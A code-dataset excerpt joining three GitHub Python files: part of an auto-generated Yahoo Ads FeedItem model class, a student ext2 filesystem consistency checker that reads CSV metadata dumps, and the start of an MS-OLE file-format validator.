This field is optional in ADD and SET operation, and will be ignored in REMOVE operation.
# noqa: E501\n\n :return: The start_date of this FeedItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._start_date\n\n @start_date.setter\n def start_date(self, start_date):\n \"\"\"Sets the start_date of this FeedItem.\n\n
配信開始日です。
※空で設定すると、既存の配信開始日は削除されます。
このフィールドは、ADDおよびSET時に省略可能となり、REMOVE時に無視されます。
Start date of ad display
∗On setting blank, existing start date of ad display will be deleted.
This field is optional in ADD and SET operation, and will be ignored in REMOVE operation.
# noqa: E501\n\n :param start_date: The start_date of this FeedItem. # noqa: E501\n :type: str\n \"\"\"\n\n self._start_date = start_date\n\n @property\n def targeting_ad_group(self):\n \"\"\"Gets the targeting_ad_group of this FeedItem. # noqa: E501\n\n\n :return: The targeting_ad_group of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceTargetingAdGroup\n \"\"\"\n return self._targeting_ad_group\n\n @targeting_ad_group.setter\n def targeting_ad_group(self, targeting_ad_group):\n \"\"\"Sets the targeting_ad_group of this FeedItem.\n\n\n :param targeting_ad_group: The targeting_ad_group of this FeedItem. # noqa: E501\n :type: FeedItemServiceTargetingAdGroup\n \"\"\"\n\n self._targeting_ad_group = targeting_ad_group\n\n @property\n def targeting_campaign(self):\n \"\"\"Gets the targeting_campaign of this FeedItem. # noqa: E501\n\n\n :return: The targeting_campaign of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceTargetingCampaign\n \"\"\"\n return self._targeting_campaign\n\n @targeting_campaign.setter\n def targeting_campaign(self, targeting_campaign):\n \"\"\"Sets the targeting_campaign of this FeedItem.\n\n\n :param targeting_campaign: The targeting_campaign of this FeedItem. # noqa: E501\n :type: FeedItemServiceTargetingCampaign\n \"\"\"\n\n self._targeting_campaign = targeting_campaign\n\n @property\n def targeting_keyword(self):\n \"\"\"Gets the targeting_keyword of this FeedItem. # noqa: E501\n\n\n :return: The targeting_keyword of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceTargetingKeyword\n \"\"\"\n return self._targeting_keyword\n\n @targeting_keyword.setter\n def targeting_keyword(self, targeting_keyword):\n \"\"\"Sets the targeting_keyword of this FeedItem.\n\n\n :param targeting_keyword: The targeting_keyword of this FeedItem. # noqa: E501\n :type: FeedItemServiceTargetingKeyword\n \"\"\"\n\n self._targeting_keyword = targeting_keyword\n\n @property\n def trademark_status(self):\n \"\"\"Gets the trademark_status of this FeedItem. # noqa: E501\n\n\n :return: The trademark_status of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceTrademarkStatus\n \"\"\"\n return self._trademark_status\n\n @trademark_status.setter\n def trademark_status(self, trademark_status):\n \"\"\"Sets the trademark_status of this FeedItem.\n\n\n :param trademark_status: The trademark_status of this FeedItem. # noqa: E501\n :type: FeedItemServiceTrademarkStatus\n \"\"\"\n\n self._trademark_status = trademark_status\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, FeedItem):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, FeedItem):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"ota2000/yahoo-ads-search","sub_path":"yahoo_ads_search/models/feed_item.py","file_name":"feed_item.py","file_ext":"py","file_size_in_byte":25325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37525956204","text":"#!/usr/bin/python\n\nimport sys, string, locale\n\ndef init_lists():\n\t#List of map block numbers for inode and block bitmaps\n\tblock_map_nums = []\n\tinode_map_nums = []\n\twith open(\"group.csv\", \"r\") as file_1:\n\t\tfor line in file_1:\n\t\t\tgroup_line = line.rstrip('\\n').split(',')\n\t\t\tblock_map_nums.append(group_line[5])\n\t\t\tinode_map_nums.append(group_line[4])\n\t#List of free blocks and inodes\n\tfree_blocks = []\n\tfree_inodes = []\n\twith open(\"bitmap.csv\", \"r\") as file_2:\n\t\tfor line in file_2:\n\t\t\tbitmap_line = line.rstrip('\\n').split(',')\n\t\t\tif(bitmap_line[0] in block_map_nums):\n\t\t\t\tfree_blocks.append(int(bitmap_line[1]))\n\t\t\tif(bitmap_line[0] in inode_map_nums):\n\t\t\t\tfree_inodes.append(int(bitmap_line[1]))\n\t#Important information from the super block, such as block size, inodes per group etc\n\tblock_size = 0\n\ttotal_inodes = 0\n\tinodes_per_group = 0\n\ttotal_blocks = 0\n\twith open(\"super.csv\", \"r\") as file_3:\n\t\tfor line in file_3:\n\t\t\tsuper_line = line.rstrip('\\n').split(',')\n\t\t\ttotal_blocks = int(super_line[2])\n\t\t\tblock_size = int(super_line[3])\n\t\t\ttotal_inodes = int(super_line[1])\n\t\t\tinodes_per_group = int(super_line[6])\n\t#Return a tuple of lists to be able to index into to get the respective values\n\treturn (free_blocks, free_inodes, block_map_nums, inode_map_nums, block_size, total_inodes, inodes_per_group, total_blocks)\n\n#Function that finds invalid blocks and unallocated blocks and creates a dictionary of duplicates\ndef block_errors(out_file):\n\t#Create a duplicate dictionary that holds block number keys and list of referenced inode lists\n\tglobal duplicate_dict\n\tlists = init_lists()\n\tfree_blocks = lists[0]\n\tblock_size = lists[4]\n\ttotal_blocks = lists[7]\n\tduplicate_dict = {}\n\twith open(\"inode.csv\", \"r\") as file_3:\n\t\t#Dictionary of block number keys to the corresponding inodes in the free list\n\t\tblock_dict = {}\n\t\tfor line in file_3:\n\t\t\tinode_line = line.rstrip('\\n').split(',')\n\t\t\t#Get only the data block pointers\n\t\t\tinode_line_sub = inode_line[11:]\n\t\t\t#Counter for entry number in data block pointers\n\t\t\tcounter = 0\n\t\t\tfor data_block in inode_line_sub:\n\t\t\t\t#Converts hex to decimal\n\t\t\t\tdec_data_block = int(data_block, 16)\n\t\t\t\t#First 12 direct data block pointers\n\t\t\t\tif(counter <= 11):\n\t\t\t\t\tif(dec_data_block > int(total_blocks)):\n\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_data_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + str(counter) + \" >\\n\")\n\t\t\t\t\t#Check for block in free blocks\n\t\t\t\t\tif(dec_data_block in free_blocks):\n\t\t\t\t\t\t#Initialize block dictionary\n\t\t\t\t\t\tif(str(dec_data_block) not in block_dict):\n\t\t\t\t\t\t\tblock_dict[str(dec_data_block)] = []\n\t\t\t\t\t\ttemp = block_dict[str(dec_data_block)]\n\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + str(counter) + \" >\")\n\t\t\t\t\t\tblock_dict[str(dec_data_block)] = temp\n\t\t\t\t\t#Initialize the duplicate dictionary\n\t\t\t\t\tif(str(dec_data_block) not in duplicate_dict):\n\t\t\t\t\t\tduplicate_dict[str(dec_data_block)] = []\n\t\t\t\t\ttemp = duplicate_dict[str(dec_data_block)]\n\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + str(counter) + \" >\")\n\t\t\t\t\tduplicate_dict[str(dec_data_block)] = temp\n\t\t\t\t\tcounter += 1\n\t\t\t\t#Single indirect block pointer\n\t\t\t\telif(counter == 12):\n\t\t\t\t\tif(dec_data_block > int(total_blocks)):\n\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_data_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + \"12\" + \" >\\n\")\n\t\t\t\t\tif(dec_data_block != 0):\n\t\t\t\t\t\twith open(\"indirect.csv\", \"r\") as file_4:\n\t\t\t\t\t\t\tfor indirect in file_4:\n\t\t\t\t\t\t\t\tindirect_line = indirect.rstrip('\\n').split(',')\n\t\t\t\t\t\t\t\tdec_indirect_block = int(indirect_line[2], 16)\n\t\t\t\t\t\t\t\t#Check for invalid block pointers\n\t\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[12], 16)) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\t\t#Check for pointed blocks in free block map, and add to the respective dictionaries\n\t\t\t\t\t\t\t\tif(dec_indirect_block in free_blocks):\n\t\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in block_dict):\n\t\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\t\ttemp = block_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[12], 16)) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\")\n\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = temp\n\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in duplicate_dict):\n\t\t\t\t\t\t\t\t\tduplicate_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\ttemp = duplicate_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[12], 16)) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\")\n\t\t\t\t\t\t\t\tduplicate_dict[str(dec_data_block)] = temp\n\t\t\t\t\t\t\t\tcounter += 1\n\t\t\t\t#Double indirect block pointer\n\t\t\t\telif(counter == 13):\n\t\t\t\t\tif(dec_data_block < 0 or dec_data_block > int(total_blocks)):\n\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_data_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + \"13\" + \" >\\n\")\n\t\t\t\t\tif(dec_data_block != 0):\n\t\t\t\t\t\tindirect_file = open(\"indirect.csv\", \"r\")\n\t\t\t\t\t\tindirect_data = readlines(indirect_file)\n\t\t\t\t\t\tentry_offset = 0;\n\t\t\t\t\t\t#Go through each single indirect block from the double indirect\n\t\t\t\t\t\tfor indirect in indirect_data:\n\t\t\t\t\t\t\tindirect_line = indirect.rstrip('\\n').split(',')\n\t\t\t\t\t\t\tentry_offset = int(indirect_line[1]) * (block_size/4 - 1);\n\t\t\t\t\t\t\t#Check for invalid block pointers\n\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[13], 16)) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\t#Go through all the data blocks pointed by each indirect block pointer entry pointed to by the doubly indirect block\n\t\t\t\t\t\t\tif(int(indirect_line[2], 16) != 0):\n\t\t\t\t\t\t\t\tfor indirect_2 in indirect_data:\n\t\t\t\t\t\t\t\t\tindirect_line = indirect_2.rstrip('\\n').split(',')\n\t\t\t\t\t\t\t\t\tdec_indirect_block = int(indirect_line[2], 16)\n\t\t\t\t\t\t\t\t\t#Check for invalid data blocks\n\t\t\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[13], 16) + entry_offset) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\t\t\t#Check for blocks in the free block map, and add to the respective dictionaries\n\t\t\t\t\t\t\t\t\tif(dec_indirect_block in free_blocks):\n\t\t\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in block_dict):\n\t\t\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\t\t\ttemp = block_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[13], 16)) + \" > ENTRY < \" + str(int(indirect_line[1]) + entry_offset) + \" >\")\n\t\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = temp\n\t\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in duplicate_dict):\n\t\t\t\t\t\t\t\t\t\tduplicate_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\t\ttemp = duplicate_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[13], 16)) + \" > ENTRY < \" + str(int(indirect_line[1]) + entry_offset) + \" >\")\n\t\t\t\t\t\t\t\t\tduplicate_dict[str(dec_data_block)] = temp\n\t\t\t\t\t\t\t\t\tcounter += 1\n\t\t\t\t#Triple indirect block pointers\n\t\t\t\telif(counter == 14):\n\t\t\t\t\tif(dec_data_block < 0 or dec_data_block > int(total_blocks)):\n\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_data_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + \"14\" + \" >\\n\")\n\t\t\t\t\tif(dec_data_block != 0):\n\t\t\t\t\t\t#Go through the triple indirect block to each of the pointed to double indirect blocks\n\t\t\t\t\t\tindirect_file = open(\"indirect.csv\", \"r\")\n\t\t\t\t\t\tindirect_data = readlines(indirect_file)\n\t\t\t\t\t\tentry_offset = 0;\n\t\t\t\t\t\tfor indirect in indirect_data:\n\t\t\t\t\t\t\tindirect_line = indirect.rstrip('\\n').split(',')\n\t\t\t\t\t\t\tentry_offset = int(indirect_line[1]) * (block_size/4 - 1)\n\t\t\t\t\t\t\t#Check for invalid block pointers in the double indirect block pointers pointed to by the triple indirect block pointers\n\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[14], 16)) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\tif(int(indirect_line[2], 16) != 0):\n\t\t\t\t\t\t\t\t#Go through the double indirect block pointers to the single indirect blocks\n\t\t\t\t\t\t\t\tfor indirect_2 in indirect_data:\n\t\t\t\t\t\t\t\t\tindirect_line = indirect_2.rstrip('\\n').split(',')\n\t\t\t\t\t\t\t\t\tentry_offset += int(indirect_line[1]) * (block_size/4 - 1)\n\t\t\t\t\t\t\t\t\t#Check for invalid block pointers in the single indirect block pointers pointed to by the double indirect block pointers\n\t\t\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[14], 16) + entry_offset) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\t\t\tif(int(indirect_line[2], 16) != 0):\n\t\t\t\t\t\t\t\t\t\t#Go through the single indirect block pointers to the data blocks\n\t\t\t\t\t\t\t\t\t\tfor indirect_3 in indirect_data:\n\t\t\t\t\t\t\t\t\t\t\tindirect_line = indirect_3.rstrip('\\n').split(',')\n\t\t\t\t\t\t\t\t\t\t\tdec_indirect_block = int(indirect_line[2], 16)\n\t\t\t\t\t\t\t\t\t\t\t#Check for invalid blocks pointed to by the single indirect block pointers\n\t\t\t\t\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[14], 16) + entry_offset) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\t\t\t\t\tif(dec_indirect_block in free_blocks):\n\t\t\t\t\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in block_dict):\n\t\t\t\t\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\t\t\t\t\ttemp = block_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[14], 16)) + \" > ENTRY < \" + str(int(indirect_line[1]) + entry_offset) + \" >\")\n\t\t\t\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = temp\n\t\t\t\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in duplicate_dict):\n\t\t\t\t\t\t\t\t\t\t\t\tduplicate_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\t\t\t\ttemp = duplicate_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[14], 16)) + \" > ENTRY < \" + str(int(indirect_line[1]) + entry_offset) + \" >\")\n\t\t\t\t\t\t\t\t\t\t\tduplicate_dict[str(dec_data_block)] = temp\n\t\t\t\t\t\t\t\t\t\t\tcounter += 1\n\t\t#Go through the block dictionary to find out what to print for unallocated blocks\n\t\tfor element in block_dict:\n\t\t\tif(len(block_dict[element]) > 0):\n\t\t\t\tout_file.write(\"UNALLOCATED BLOCK < \" + str(element) + \" > REFERENCED BY\")\n\t\t\t\tfor out_string in block_dict[element]:\n\t\t\t\t\tout_file.write(out_string)\n\t\t\t\tout_file.write(\"\\n\")\n\n#Use the duplicate dictionary to find the multiply allocated blocks\ndef duplicate_allocated_blocks(out_file):\n\tglobal duplicate_dict\n\tfor key in duplicate_dict:\n\t\t#If the number of referenced inodes for the respective block number is more than 1, then we know its multiply allocated \n\t\tif(len(duplicate_dict[key]) > 1 and key != \"0\"):\n\t\t\tstatement = \"MULTIPLY REFERENCED BLOCK < \" + key + \" > BY\"\n\t\t\tfor tup in duplicate_dict[key]:\n\t\t\t\tstatement += tup\n\t\t\tstatement += '\\n'\n\t\t\tout_file.write(statement)\n\n#Check for unallocated inodes\ndef unallocated_inode(directory_file, out_file):\n\tglobal inode_data\n\tfile_list = open_files()\n\tlists = init_lists()\n\tfree_inodes = lists[1]\n\t#Dictionary of inodes to the referenced directory entries\n\tunallocated_dict = {}\n\t#Holds a list of allocated inodes from the inode.csv file for use in other functions\n\tinode_data = []\n\twith open(\"inode.csv\", \"r\") as inode_file:\n\t\tfor line in inode_file:\n\t\t\tinode_line = line.split(',')\n\t\t\tinode_data.append(inode_line[0])\n\twith open(\"directory.csv\", \"r\") as file_1:\n\t\tfor line in file_1:\n\t\t\t#Ignore the naming of the file/directory as that could have unwanted characters\n\t\t\tdirectory_line = line.split(',')[0:5]\n\t\t\tif(len(directory_line) == 5 and (int(directory_line[4]) in free_inodes or directory_line[4] not in inode_data)):\n\t\t\t\tif(str(directory_line[4]) not in unallocated_dict):\n\t\t\t\t\tunallocated_dict[str(directory_line[4])] = []\n\t\t\t\ttemp = unallocated_dict[str(directory_line[4])]\n\t\t\t\ttemp.append(\" DIRECTORY < \" + directory_line[0] + \" > ENTRY < \" + directory_line[1] + \" >\")\n\t\t\t\tunallocated_dict[str(directory_line[4])] = temp\n\t#Go through the unallocated inodes and print out the respective information\n\tfor element in unallocated_dict:\n\t\tif(len(unallocated_dict[element]) > 0):\n\t\t\tout_file.write(\"UNALLOCATED INODE < \" + element + \" > REFERENCED BY\")\n\t\t\tfor out_string in unallocated_dict[element]:\n\t\t\t\tout_file.write(out_string)\n\t\t\tout_file.write(\"\\n\")\n#Find missing inodes by looking through the allocated inodes and free inodes, and the overall number of inodes\ndef missing_inode(inode_file, out_file):\n\tglobal inode_data\n\tfile_list = open_files()\n\tlists = init_lists()\n\tfree_inodes = lists[1]\n\tinode_block_num = lists[3]\n\ttotal_inodes = lists[5]\n\tinodes_per_group = lists[6]\n\twith open(\"inode.csv\", \"r\") as file_1:\n\t\tfor line in file_1:\n\t\t\tinode_line = line.split(',')[0:10]\n\t\t\t#Ignoring the first 10 reserved inodes, look to see if the allocated inode is missing from the free list\n\t\t\tif(inode_line[5] == \"0\" and inode_line[0] not in free_inodes and int(inode_line[0]) > 10):\n\t\t\t\tlist_num = 0\n\t\t\t\t#Find out which free list it should belong to\n\t\t\t\tfor i in range(len(inode_block_num)):\n\t\t\t\t\tlist_num += int(inodes_per_group)\n\t\t\t\t\tif(list_num > int(inode_line[0])):\n\t\t\t\t\t\tlist_num = int(inode_block_num[i])\n\t\t\t\t\t\tbreak\n\t\t\t\tout_file.write(\"MISSING INODE < \" + inode_line[0] + \" > SHOULD BE IN FREE LIST < \" + str(list_num) + \" >\\n\")\n\t#Go through all inodes from 11 to max inode number to see if they don't exist in the free list or allocated inodes\n\tfor i in range(11, int(total_inodes)):\n\t\tif(i not in free_inodes and str(i) not in inode_data):\n\t\t\tlist_num = 0\n\t\t\tfor i in range(len(inode_block_num)):\n\t\t\t\tlist_num += int(inodes_per_group)\n\t\t\t\tif(list_num > i):\n\t\t\t\t\tlist_num = int(inode_block_num[i])\n\t\t\t\t\tbreak\n\t\t\tout_file.write(\"MISSING INODE < \" + str(i) + \" > SHOULD BE IN FREE LIST < \" + str(list_num) + \" >\\n\")\n\n#Calculate the link counts by looking at the references and the actual number of links in inode.csv\ndef incorrect_link_count(inode_file, out_file):\n with open(\"inode.csv\", \"r\") as file_1:\n for line in file_1:\n inode_line = line.split(',')\n #Reported link count\n link_count = inode_line[5]\n inode_num = inode_line[0]\n reference_count = 0\n with open(\"directory.csv\", \"r\") as file_2:\n \t#Calculate the actual number of links by looking through all the directories\n for line_2 in file_2:\n directory_line = line_2.split(',')[0:5]\n if(len(directory_line) == 5 and directory_line[4] == inode_num):\n reference_count += 1\n if(int(link_count) != int(reference_count)):\n out_file.write(\"LINKCOUNT < \" + str(inode_num) + \" > IS < \" + str(link_count) + \" > SHOULD BE < \" + str(reference_count) + \" >\\n\")\n \n#Look at the . and .. to look for inconsistent directory entries\ndef incorrect_directory_entry(directory_file, out_file):\n data = \"\"\n dataFile = open(\"directory.csv\", \"r\")\n data = dataFile.readlines()\n with open(\"directory.csv\", \"r\") as file_1:\n for line in file_1:\n directory_line = line.split(',')\n if(len(directory_line) == 6):\n \t#Check for the current directory against its own parent inode, they should be the same, else its an error\n if(directory_line[5] == '\".\"\\n'):\n if(directory_line[0] != directory_line[4]):\n out_file.write(\"INCORRECT ENTRY IN < \" + directory_line[0] + \" > NAME < . > LINK TO < \" + directory_line[4] + \" > SHOULD BE < \" + directory_line[0] + \" >\\n\")\n elif(directory_line[5] == '\"..\"\\n'):\n for line_2 in data:\n directory_line_2 = line_2.split(',')\n if(len(directory_line_2) == 6):\n #Look through the referenced parent directory to see if it contains a child directory that is the referencee directory\n if(directory_line_2[4] == directory_line[0] and directory_line_2[0] != directory_line[4] and directory_line_2[5] != '\".\"\\n' and directory_line_2[5] != '\"..\"\\n'):\n out_file.write(\"INCORRECT ENTRY IN < \" + directory_line[0] + \" > NAME < .. > LINK TO < \" + directory_line[4] + \" > SHOULD BE < \" + directory_line_2[0] + \" >\\n\")\n\n#Open all the files initially and put them in a list for easy closing\ndef open_files():\n super_f = open(\"super.csv\", \"r\")\n group_f = open(\"group.csv\", \"r\")\n bitmap_f = open(\"bitmap.csv\", \"r\")\n inode_f = open(\"inode.csv\", \"r\")\n directory_f = open(\"directory.csv\", \"r\")\n indirect_f = open(\"indirect.csv\", \"r\")\n out_f = open(\"lab3b_check.txt\", \"w+\")\n file_list = [super_f, group_f, bitmap_f, inode_f, directory_f, indirect_f, out_f]\n return file_list\n\n#Close all files\ndef close_files():\n f_list = open_files()\n for file in f_list:\n file.close()\n\n#Generate all the possible errors by parsing all the given files\ndef main():\n file_list = open_files()\n block_errors(file_list[6]) \n duplicate_allocated_blocks(file_list[6])\n unallocated_inode(file_list[4], file_list[6])\n missing_inode(file_list[3], file_list[6])\n incorrect_link_count(file_list[3], file_list[6])\n incorrect_directory_entry(file_list[3], file_list[6])\n close_files()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jcherianucla/UCLA-CS-111","sub_path":"Project 3B/lab3b.py","file_name":"lab3b.py","file_ext":"py","file_size_in_byte":17855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43548247502","text":"import array\nimport struct\n\nfrom Validator import Validator\n\n\nclass MSOLEValidator(Validator):\n \"\"\"\n Class that validates an object to determine if it is a valid MSOle file.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Calls to super().__init__(). No specific attributes are needed.\n \"\"\"\n super(MSOLEValidator, self).__init__()\n # some initial values in case someone calls GetDetails() early:\n self.extension = []\n self.sector_size = -1\n self.sat = []\n self.sat_dict = {}\n self.msat = []\n self.msat_secs = []\n self.msat_secids = []\n self.sat_secs = -1\n self.max_sector = -1\n self.converters = { # this dictionary defines the behaviour of _ConvertBytes, DO NOT TOUCH!\n 'sH': struct.Struct(\" -1\n\n def _FilterMsat(self, x):\n return x < -2\n\n def _FilterSat(self, x):\n return x < -4 or x > self.max_sector\n\n def _GetExtension(self):\n self.extension = []\n if self.is_valid:\n #self.fd.seek(0)\n #data = self.fd.read(self.bytes_last_valid)\n if \"Word Document\" in self.data:\n self.extension.append(\".doc\")\n if \"Worksheet\" in self.data: # or \"Workbook\" in data: # need to confirm this\n self.extension.append(\".xls\")\n if \"PowerPoint\" in self.data:\n self.extension.append(\".ppt\")\n # should change all this comparisons for one regex that matches and get the result from\n # a dict -- that should have better performance, though i doubt this might be a problem.\n\n def _Read(self, length):\n ret = self.data[self.pos: self.pos + length]\n if len(ret) < length:\n self.eof = True\n self.pos += length\n return ret\n\n def GetDetails(self):\n \"\"\"\n Returns a dictionary with detailed information about the last validated file.\n\n :return: dict of:\n * sector_size (int)\n * msat (list of ints)\n * msat_secs (int)\n * msat_secids (list of ints)\n * sat_secs (int)\n \"\"\"\n return {\n \"sector_size\": self.sector_size,\n \"msat\": self.msat,\n \"sat\": self.sat,\n \"msat_secs\": self.msat_secs,\n \"msat_secids\": self.msat_secids,\n \"sat_secs\": self.sat_secs,\n \"extensions\": self.extension,\n \"max_sector\": self.max_sector,\n }\n \n def Validate(self, fd):\n \"\"\"\n Validates a file-like object to determine if its a valid MS-OLE file.\n\n :param fd: file descriptor (file-like)\n :return: True on valid MS-OLE, False otherwise (bool)\n \"\"\"\n # GetDetails cleanup of variables\n self.extension = []\n self.sector_size = -1\n self.sat = []\n self.sat_dict = {}\n self.msat = []\n self.msat_secs = -1\n self.msat_secids = []\n self.sat_secs = -1\n self.max_sector = -1\n sector_size = -1 # i think this four variables should go away once cleanup is over\n # and rest of the initial setup\n self.pos = 0\n if type(fd) == file:\n self.data = fd.read()\n elif type(fd) == str:\n self.data = fd\n else:\n raise Exception(\"Argument must be either a file or a string.\")\n self.is_valid = True\n self._SetValidBytes(0)\n self.eof = False\n self.end = False\n cdh = self._Read(512)\n sector = \"\"\n header = cdh[0:8]\n byte_order = cdh[28:30] # MS-OLE supports big endian and little endian data, however we\n # couldn't find a big endian file to check if the validator works correctly.\n ssz = self._ConvertBytes(cdh[30:32], \"sH\")\n # x and sat_secs are declared here to avoid referenced-before-assignment errors\n x_index = 0\n self.is_valid = ((header == '\\xd0\\xcf\\x11\\xe0\\xa1\\xb1\\x1a\\xe1') and\n (byte_order == '\\xfe\\xff' or byte_order == '\\xff\\xfe') and\n (ssz >= 7) and len(cdh) == 512)\n if self.is_valid:\n # So far we have a valid CDH, now we have to:\n # * build the MSAT\n # * walk through the SAT, verifying with the MSAT the SAT-assigned sectors\n # The file will be valid as long as the SAT and MSAT are coherent between each other.\n # This method is based on Simson Garfinkel's S2 MS-OLE validator, with modifications\n # adapted from OpenOffice MS-OLE format description and methods to comply with the\n # Validation Framework.\n self._SetValidBytes(512)\n self.sector_size = 1 << ssz\n self.sat_secs = self._ConvertBytes(cdh[44:48], \"sL\")\n msat_secid = self._ConvertBytes(cdh[68:72], \"sL\")\n self.msat_secids.append(msat_secid)\n self.msat_secs = self._ConvertBytes(cdh[72:76], \"sL\")\n self.msat = array.array(\"l\", cdh[76:512])\n file_location = -1\n while (msat_secid > -1) and not self.eof:\n new_location = 512 + (msat_secid * sector_size)\n if new_location <= file_location:\n self.is_valid = False\n break\n file_location = new_location\n try:\n self.pos = file_location\n #self.fd.seek(file_location) # maybe _Read() should have a location parameter?\n except IOError:\n self.is_valid = False\n break\n 